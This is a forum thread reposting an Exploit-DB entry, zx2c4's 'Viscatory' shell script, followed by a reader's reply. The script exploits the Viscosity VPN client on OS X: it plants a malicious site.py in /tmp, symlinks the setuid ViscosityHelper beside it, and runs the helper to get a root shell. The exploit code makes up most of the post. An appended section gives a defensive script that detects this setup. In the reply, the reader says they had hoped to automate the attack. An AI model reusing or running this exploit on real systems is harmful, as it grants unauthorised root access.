DarkyAngel Posted August 13, 2012

[table=width: 500, class: grid]
[tr][td]EDB-ID: 20485[/td][td]CVE: N/A[/td][td]OSVDB-ID: N/A[/td][/tr]
[tr][td]Author: zx2c4[/td][td]Published: 2012-08-13[/td][td]Verified: [/td][/tr]
[/table]

[code]
#!/bin/sh

###########################
#        Viscatory        #
#                         #
#          zx2c4          #
###########################

# After the hullabaloo from the Tunnelblick local root, savvy Mac users
# began defending Viscosity, another OS X VPN client. They figured, since
# they spent money on Viscosity, surely it would be better designed than
# the free open-source alternative.
#
# Unfortunately, this exploit took all of 2 minutes to find. DTrace for
# the win. Here, the SUID helper will execute site.py in its enclosing
# folder. A simple symlink, and we have root.
#
# greets to jono
#
# Source: http://git.zx2c4.com/Viscatory/tree/viscatory.sh

echo "[+] Crafting payload."
mkdir -p -v /tmp/pwn
cat > /tmp/pwn/site.py <<_EOF
import os
print "[+] Cleaning up."
os.system("rm -rvf /tmp/pwn")
print "[+] Getting root."
os.setuid(0)
os.setgid(0)
os.execl("/bin/bash", "bash")
_EOF
echo "[+] Making symlink."
ln -s -f -v /Applications/Viscosity.app/Contents/Resources/ViscosityHelper /tmp/pwn/root
echo "[+] Running vulnerable SUID helper."
exec /tmp/pwn/root
[/code]

Source
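A defender-side check for the setup the post above describes, as an added example that is not part of the original post or of zx2c4's script: it lists symlinks under a directory whose target is a setuid executable and notes whether a site.py sits beside the link. The function names and the default scan directories /tmp and /var/tmp are assumptions made for this example.

```shell
#!/bin/sh
# Added example, not from the original post. Function names and default
# directories are assumptions chosen for illustration.

# Print one line per symlink under directory $1 whose target is a setuid
# regular file. The post says the SUID helper runs site.py from the folder
# it is invoked from, so a site.py next to such a link is called out.
# Any setuid target is reported; ownership of the target is not checked.
find_suid_symlinks() {
    find "$1" -xdev -type l -exec sh -c '
        for link in "$@"; do
            # -f and -u follow the link, so they describe the target
            [ -f "$link" ] && [ -u "$link" ] || continue
            if [ -e "$(dirname "$link")/site.py" ]; then
                note="site.py beside link"
            else
                note="no site.py"
            fi
            printf "%s -> %s (%s)\n" "$link" "$(readlink "$link")" "$note"
        done' sh {} + 2>/dev/null || true   # unreadable subtrees are skipped
}

# Scan every directory given as an argument, or the two common
# world-writable locations when none is given.
scan_dirs() {
    [ $# -gt 0 ] || set -- /tmp /var/tmp
    for d in "$@"; do
        if [ -d "$d" ]; then
            find_suid_symlinks "$d"
        fi
    done
    return 0
}

# Run a scan only when directories are passed on the command line,
# e.g.  sh this_script.sh /tmp /var/tmp
[ $# -eq 0 ] || scan_dirs "$@"
```

A hit with "site.py beside link" in a world-writable directory matches the layout the script in the post creates and is worth triaging first.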
Zatarra Posted August 13, 2012

Fuck.. it's for Macs, and here I was wanting to build an automation for it..